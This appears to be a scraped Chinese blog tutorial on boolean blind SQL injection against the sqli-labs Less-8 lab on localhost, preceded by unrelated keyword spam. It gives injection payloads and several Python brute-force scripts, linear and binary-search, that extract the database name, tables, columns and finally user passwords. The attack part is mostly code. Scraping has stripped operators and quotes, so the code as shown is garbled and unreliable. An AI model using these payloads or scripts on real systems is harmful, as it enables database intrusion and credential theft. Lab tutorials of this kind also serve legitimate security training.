做国内学历公证的网站,网络推广运营主要做什么,网站开发的英文书有什么,网站的二级导航怎么做目录
1 布尔盲注
2布尔盲注流程
2.1输入id进行测试 2.2判断注入类型
2.3爆数据库名
2.4爆表名
2.5爆字段名 2.6查询数据 1 布尔盲注
布尔盲注就是在SQL注入过程中#xff0c;SQL语句执行后#xff0c;查询到的数据不能回显到前端页面#xff0c;如果正确执行了构造的…目录
1 布尔盲注
2布尔盲注流程
2.1输入id进行测试 2.2判断注入类型
2.3爆数据库名
2.4爆表名
2.5爆字段名 2.6查询数据 1 布尔盲注
布尔盲注就是在SQL注入过程中SQL语句执行后查询到的数据不能回显到前端页面如果正确执行了构造的SQL语句则返回一种页面如果错误则执行另一种页面。基于两种页面来判断SQL语句正确与否达到获取数据的目的。
2布尔盲注流程
2.1输入id进行测试
输入?id1发现页面回显You are in.......... 输入?id1发现页面无显示 此时联想到正确错误两个页面采用布尔盲注 2.2判断注入类型 1.?id1 and 11 和?id1 and 12进行测试如果11页面显示正常和原页面一样并且12页面报错或者页面部分数据显示不正常那么可以确定此处为数字型注入。 2.?id1 and 11--和?id1 and 12--进行测试如果11页面显示正常和原页面一样并且12页面报错或者页面部分数据显示不正常那么可以确定此处为字符型注入。 根据结果可判断为字符型注入
2.3爆数据库名
如何获取数据库呢可以通过截取字符串的方式进行获取。substr(string, start, length) 截取字符串这个函数的意思简单来说截取一个字符串从start位可以是第1位第2位。。。。每次截取length个字符。然后使用ascii()函数。其作用是将字符转换成对应的ascii值。
?id1 and ascii(substr(database(),1,1))97--
如果数据库名的第一个字符的ascii码值等于97则页面显示正确的页面如果数据库名的第一个字符的ascii码值不等于97则页面显示错误的页面 页面无显示说明数据库名的第一个字符的ascii码值不等于97
我们可以编写一个简单的python脚本就可以爆破出数据库名
import timeimport requestsurl http://127.0.0.1/sqli-labs-master/less-8/index.phpdef inject_database(url):name for i in range(1, 20):for j in range(32, 129):payload 1 and ascii(substr(database(), %d, 1)) %d-- % (i, j)res {id: payload}r requests.get(url, paramsres)if You are in........... in r.text:name name chr(j)print(name)breakelse:continueinject_database(url) 根据运行结果得出数据库名为security
2.4爆表名
使用count() 函数进行获取表的数量
1 and (select count(table_name) from information_schema.tables where table_schemasecurity)2-- 1 and (select count(table_name) from information_schema.tables where table_schemasecurity)4-- 可以看出security下有四张表,然后进行爆表名
1 and ascii(substr((select group_concat(table_name) from information_schema.tables where table_schemasecurity),1,1))101-- mysql 中的 information_schema 这个库 就像时MYSQL的信息数据库他保存着mysql 服务器所维护的所有其他的数据库信息 包括了 库名表名列名。 在注入时information_schema库的作用就是获取 table_schema table_name, column_name .
这些数据库内的信息。如果information_schema库被过滤掉还可以尝试使用下述库来代替 sys.schema_auto_increment_columns sys.schema_table_statistics_with_buffer mysql.innodb_table_stats mysql.innodb_table_index 然后编写一个简单的python脚本就可以爆破出所有的表名
import requestsurl http://127.0.0.1/sqli-labs-master/less-8/index.phpdef boolean_blind_inject(url):name for i in range(1, 50):low 32high 128while low high:mid (low high) // 2# 构造布尔盲注的payloadpayload 1 and ascii(substr((select group_concat(table_name) from information_schema.tables where table_schemasecurity),%d,1)) %d-- %(i, mid)params {id: payload} # 使用 params 而不是 data# 发送 GET 请求r requests.get(url, paramsparams)# 根据页面内容或状态码判断是否注入成功if You are in........... in r.text:low mid 1else:high midmid (low high) // 2if mid 32: # 如果 mid 为 32则表示已经到达字符串的末尾breakname chr(mid)print(name)# 调用函数
boolean_blind_inject(url)上述代码采用二分法提高效率
根据运行结果得出表名为emails,referers,uagents,users 2.5爆字段名
根据表名知道可能用户的账户和密码是在users表中接下来我们就是得到该表下的字段名以及内容。
同样使用python脚本来爆破出字段名只需将刚才的python脚本中的payload变换一下
import requestsurl http://127.0.0.1/sqli-labs-master/less-8/index.phpdef boolean_blind_inject(url):name for i in range(1, 50):low 32high 128while low high:mid (low high) // 2# 构造布尔盲注的payloadpayload 1 and ascii(substr((select group_concat(column_name) from information_schema.columns where table_schemasecurity and table_nameusers),%d,1)) %d-- %(i, mid)params {id: payload} # 使用 params 而不是 data# 发送 GET 请求r requests.get(url, paramsparams)# 根据页面内容或状态码判断是否注入成功if You are in........... in r.text:low mid 1else:high midmid (low high) // 2if mid 32: # 如果 mid 为 32则表示已经到达字符串的末尾breakname chr(mid)print(name)# 调用函数
boolean_blind_inject(url)根据运行结果得出字段名为idusername,password 2.6查询数据
import requestsurl http://127.0.0.1/sqli-labs-master/less-8/index.phpdef boolean_blind_inject(url):name for i in range(1, 200):low 32high 128while low high:mid (low high) // 2# 构造布尔盲注的payloadpayload 1 and ascii(substr((select group_concat(username,id,password) from users),%d,1)) %d-- %(i, mid)params {id: payload} # 使用 params 而不是 data# 发送 GET 请求r requests.get(url, paramsparams)# 根据页面内容或状态码判断是否注入成功if You are in........... in r.text:low mid 1else:high midmid (low high) // 2if mid 32: # 如果 mid 为 32则表示已经到达字符串的末尾breakname chr(mid)print(name)# 调用函数
boolean_blind_inject(url)这样我们就爆出各个用户的账号密码了本次手布尔盲注到此结束如果不会写python脚本也可以使用BurpSuite工具来破解数据感兴趣的同学可以自行搜索相关资料学习。